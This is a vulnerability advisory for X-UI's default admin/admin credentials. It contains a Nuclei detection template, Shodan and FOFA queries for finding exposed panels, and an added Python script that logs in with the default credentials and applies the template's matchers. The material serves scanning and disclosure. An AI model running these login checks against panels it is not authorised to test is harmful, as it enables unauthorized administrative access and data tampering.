xui-default-login: X-UI - Default Login

Date: 2025-08-01 | Affected software: X-UI | PoC: public

Vulnerability description

X-UI ships with default credentials (username admin, password admin, as documented in the reference below) and does not force them to be changed. An attacker who can reach the panel's /login endpoint can authenticate as the administrator with those credentials and then read sensitive information, modify data and perform unauthorized operations in the panel.

PoC code [public]

id: xui-default-login

info:
  name: X-UI - Default Login
  author: dali
  severity: high
  description: |
    X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/vaxilu/x-ui
    - https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
  classification:
    cwe-id: CWE-798
    cpe: cpe:2.3:a:vaxilu:x-ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: title="X-UI Login"
    shodan-query: title:"X-UI Login"
    product: x-ui
    vendor: vaxilu
  tags: x-ui,default-login,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/login"

  - method: POST
    path:
      - "{{BaseURL}}/login"

    headers:
      content-type: application/x-www-form-urlencoded

    body: "username={{username}}&password={{password}}"

    attack: pitchfork
    payloads:
      username:
        - "admin"
      password:
        - "admin"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - '!contains(http_1_body, "\"success\":true")'
          - 'contains_all(http_2_body, "\"success\":true", "msg\":")'
          - "contains(http_2_header, 'application/json')"
          - "http_2_status_code == 200"
        condition: and
# digest: 4b0a004830460221009db5ad9a707d5b5d1d7d5453f0e073bf0f5a61cafa6a15f215f6af09ce756b090221008092e0e7ff1d0df2d64ee1f83080407d1c64aecc1d06ac992a3fd75a67eae0e1:922c64590222798bb761d5b6d8e72950
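The template above sends two requests and only reports a hit when all four DSL conditions hold. The following Python reproduces that same two-request check outside Nuclei, with the matcher logic split into a pure function so it can be tested offline against constructed responses. This is an added example, not code from the x-ui project or from the nuclei-templates repository; the sample bodies below are constructed, the base URL in the usage line is hypothetical, and the `msg` text of a real x-ui response is not taken from the page.

```python
"""Added example: Python reproduction of the xui-default-login check.

Not code from x-ui or nuclei-templates. Sample responses are constructed
to mirror the shape the template matches on, not captured from a real panel.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

SUCCESS_MARKER = '"success":true'   # substring the template looks for
MSG_MARKER = 'msg":'                # second substring required by contains_all

# Constructed sample responses (not real x-ui output).
CONSTRUCTED_LOGIN_PAGE = "<html><head><title>X-UI Login</title></head><body>login form</body></html>"
CONSTRUCTED_JSON_HEADERS = {"Content-Type": "application/json; charset=utf-8"}
CONSTRUCTED_LOGIN_OK = '{"success":true,"msg":"login ok","obj":null}'
CONSTRUCTED_LOGIN_FAIL = '{"success":false,"msg":"wrong password","obj":null}'


def matches_default_login(get_body: str, post_status: int,
                          post_headers: dict, post_body: str) -> bool:
    """Mirror the template's four DSL matchers joined with 'and'.

    1. the GET /login body must NOT already contain "success":true
       (a page that echoes that string unconditionally must not match),
    2. the POST /login body must contain both "success":true and msg":,
    3. the POST response must carry an application/json content type,
    4. the POST status must be 200.
    """
    if SUCCESS_MARKER in get_body:
        return False
    if post_status != 200:
        return False
    # The DSL checks the raw header block; flatten ours the same way.
    header_blob = "\n".join(f"{k}: {v}" for k, v in post_headers.items())
    if "application/json" not in header_blob:
        return False
    return SUCCESS_MARKER in post_body and MSG_MARKER in post_body


def check_default_login(base_url: str, username: str = "admin",
                        password: str = "admin", timeout: float = 10.0) -> bool:
    """Run the live check: GET /login, then POST the default credentials.

    Returns True only when matches_default_login() accepts both responses.
    Network errors and non-2xx POST responses are treated as 'no match'.
    """
    login_url = base_url.rstrip("/") + "/login"
    try:
        with urllib.request.urlopen(login_url, timeout=timeout) as resp:
            get_body = resp.read().decode("utf-8", "replace")
        form = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        req = urllib.request.Request(
            login_url, data=form,
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            post_status = resp.status
            post_headers = dict(resp.headers.items())
            post_body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError:
        # e.g. 401/403: credentials rejected or a different login flow.
        return False
    except (urllib.error.URLError, OSError):
        return False
    return matches_default_login(get_body, post_status, post_headers, post_body)


if __name__ == "__main__":
    # Usage (hypothetical target): python3 xui_default_login.py http://panel.example:54321
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:54321"
    print("VULNERABLE" if check_default_login(target) else "not matched", target)
```

The first matcher is the one worth keeping when adapting this to other panels: without it, any login page that happens to embed the literal `"success":true` in its HTML would be reported as a default-credential hit regardless of what the POST returned.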